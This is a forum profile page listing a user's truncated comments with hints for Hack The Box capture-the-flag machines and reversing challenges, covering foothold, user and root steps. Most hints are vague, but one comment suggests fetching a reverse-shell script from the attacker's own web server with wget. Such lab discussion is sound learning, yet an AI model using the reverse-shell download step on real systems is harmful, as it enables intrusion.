waza

About

Username
waza
Joined
Visits
208
Last Active
Roles
Member

Comments

  • Anyone willing to sanity check? i'm sure about the root privesc but it doesn't seem to execute (tried a bunch of stuff tho) Edit: nvm, got it...
  • Pretty easy one! Can't even think of hints that do not disclose it completely! Anyone that needs some help/guidance, pm me! Just say upfront what you have and where you stuck!
  • Took me a day to solve it without any tooling (besides IDA and its embedded debugger). At first it may seem a bit complex but as you start pulling the string it becomes more and more evident what you need to actually bypass. Check the file entry po…
    in debugme Comment by waza May 20
  • Type your comment> @alemusix said: (Quote) it is not unstable, is HTB that thinks that everything is a "race condition" and cleans everything shortly
  • Oh my lord, my first hard box ! Dude, never messed with almost any of this things but bit by bit i was able to progress (not fast, but progress at least). Took me a WHOLE week, but i assume that when familiar with the technologies is not something …
  • Foothold: Simple enumeration leads you there. It's ugly to do, but you might need to steal something! If you don't know what to steal, check around what you can do and see. User: Not difficult, the standard enumeration should lead you where you ne…
  • Quite a ride, got it in the end. If somebody is asking why it does work locally, try it in 32bit system. In mine (64bit) it was not working and a new vm did the trick for testing If you need help reach out to me
  • Nice box, very good to mess with stuff that i never did before! Foothold: Well, a must check pentesting procedure should lead you there. If you never messed with it (like me) search for that typ key :) User: Did you checked everything before getti…
  • Well, i took a bit more time since i never read c++ code (nor its assembly form) but the solution is way easier (and less time consuming) to get than by brute forcing it ! That one simple instruction in the middle of it needed a bit of attention ! …
  • Type your comment> @Hybr0x said: (Quote) If you have that account with that level of permissions, you have inherent RCE (by design)
  • Hey guys, thanks a lot ! I did the academy windows fundamentals and it was pretty straight forward! Guess i'll upgrade to VIP just to start messing with easy boxes together with some reading on those subjects you suggested
  • Rooted, quite an easy box actually! Foothold: check the request and play with it User: old vulnerability, search for it Root: Never played with go, but i think its doable with a bit of research. When exploiting binaries what is the most useful thi…
  • Type your comment> @aimforthehead said: (Quote) Because it is not that file (i think its a .j**n, check the docs), and you need to restart the service (to apply the key).
  • Rooted :D Foothold: simple enumeration will guide you in the right place Enum the right place Docs User: And you already have it root: Easiest part. the traditional scritps will bloat your screen, you should notice that! (examine the folder. y…
  • Type your comment> @trcm said: (Quote) how you generating it??
  • What i suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems this approach got me good: wget "yourserver/rev.sh" && …
  • Rooted! why am i so distracted and overlook things??? Contrary to everyone, the user was easier than the root ! Might be luck but, things just went the right path (even not using docker prior to this)... foot: * look carefully (enumeration) * S…
Avatar

Howdy, Stranger!

Click here to create an account.